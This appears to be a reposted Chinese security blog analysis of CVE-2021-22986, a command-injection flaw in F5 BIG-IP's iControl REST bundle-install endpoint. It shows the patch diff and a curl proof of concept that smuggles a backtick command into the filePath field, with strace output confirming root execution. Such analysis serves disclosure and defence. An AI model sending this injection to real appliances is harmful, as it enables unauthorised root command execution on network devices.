CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE

  • A+
所属分类:安全文章


CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE


        此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用,而不能通过数据平面利用。剥削可能导致完全的系统危害。设备模式下的BIG-IP系统也容易受到攻击。


CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE


CVE-2021-22986


        从补丁分析和测试来看,此漏洞似乎涉及某种身份验证绕过甚至SSRF。下面的完整上下文修补程序已对其行号进行了调整,以供在调试器中使用。


RCE


        这是命令中的认证后根命令注入tar(1)

修补


        过滤将应用于用户控制的taskState.filePath参数

[snip]+  private static final Pattern validFilePathChars = Pattern.compile("(^[a-zA-Z][a-zA-Z0-9_.\-\s()]*)\.([tT][aA][rR]\.[gG][zZ])$");[snip]   private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {     if (Utilities.isNullOrEmpty(taskState.filePath)) {       File agcUseCasePackDir = new File("/var/apm/f5-iappslx-agc-usecase-pack/");       if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {         String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.";         failTask(taskState, error, "");         return;       }       File[] agcUseCasePack = agcUseCasePackDir.listFiles();       if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {
String error = "Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack."; failTask(taskState, error, ""); return; } taskState.filePath = agcUseCasePack[0].getPath(); }
+ String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);+ Matcher m = validFilePathChars.matcher(filename);+ if (!m.matches()) {+ String errorMessage = String.format("Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed", new Object[] { filename });++++ failTask(taskState, errorMessage, "");++ return;+ } final String extractTarCommand = "tar -xf " + taskState.filePath + " -O > /dev/null";

ShellExecutor extractTar = new ShellExecutor(extractTarCommand);
CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>() { public void completed(ShellExecutionResult extractQueryResult) { if (extractQueryResult.getExitStatus().intValue() != 0) { String error = extractTarCommand + " failed with exit code=" + extractQueryResult.getExitStatus();

IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", error + "stdout + stderr=" + extractQueryResult.getOutput());

return; }

taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM; IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState); }

public void failed(Exception ex, ShellExecutionResult rpmQueryResult) { IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, "Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.", String.format("%s failed", new Object[] { this.val$extractTarCommand }) + RestHelper.throwableStackToString(ex)); } };


extractTar.startExecution(executionFinishedHandler); }[snip]


PoC


        受影响的端点为/mgmt/tm/access/bundle-install-tasks

wvu@kharak:~$ curl -ksu admin:[redacted] https://192.168.123.134/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`id`"}' | jq .{  "filePath": "`id`",  "toBeInstalledAppRpmsIndex": -1,  "id": "36671f83-d1be-4f5a-a2e6-7f9442a2a76f",  "status": "CREATED",  "userReference": {    "link": "https://localhost/mgmt/shared/authz/users/admin"  },  "identityReferences": [    {      "link": "https://localhost/mgmt/shared/authz/users/admin"    }  ],  "ownerMachineId": "ac2562f0-e41f-4652-ba35-6a2b804b235e",  "generation": 1,  "lastUpdateMicros": 1615930477819656,  "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",  "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/36671f83-d1be-4f5a-a2e6-7f9442a2a76f"}wvu@kharak:~$


        该id(1)命令以root用户身份执行

[pid 64748] execve("/bin/tar", ["tar", "-xf", "uid=0(root)", "gid=0(root)", "groups=0(root)", "context=system_u:system_r:initrc_t:s0", "-O"], [/* 9 vars */]) = 0


        可能会出现错误/var/log/restjavad.0.log

[SEVERE][10029][16 Mar 2021 21:34:37 UTC][8100/tm/access/bundle-install-tasks IAppBundleInstallTaskCollectionWorker] Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive. error details: tar -xf `id` -O > /dev/null failedorg.apache.commons.exec.ExecuteException: Process exited with an error: 2 (Exit value: 2)  at org.apache.commons.exec.DefaultExecutor.executeInternal(DefaultExecutor.java:404)  at org.apache.commons.exec.DefaultExecutor.access$200(DefaultExecutor.java:48)  at org.apache.commons.exec.DefaultExecutor$1.run(DefaultExecutor.java:200)  at java.lang.Thread.run(Thread.java:748)



RCE更新


        Rich Warren使用SSRF制作了完整的RCE链


参考文献:

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986


本文始发于微信公众号(Khan安全攻防实验室):CVE-2021-22986 F5 BIG-IP/BIG-IQ RCE

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: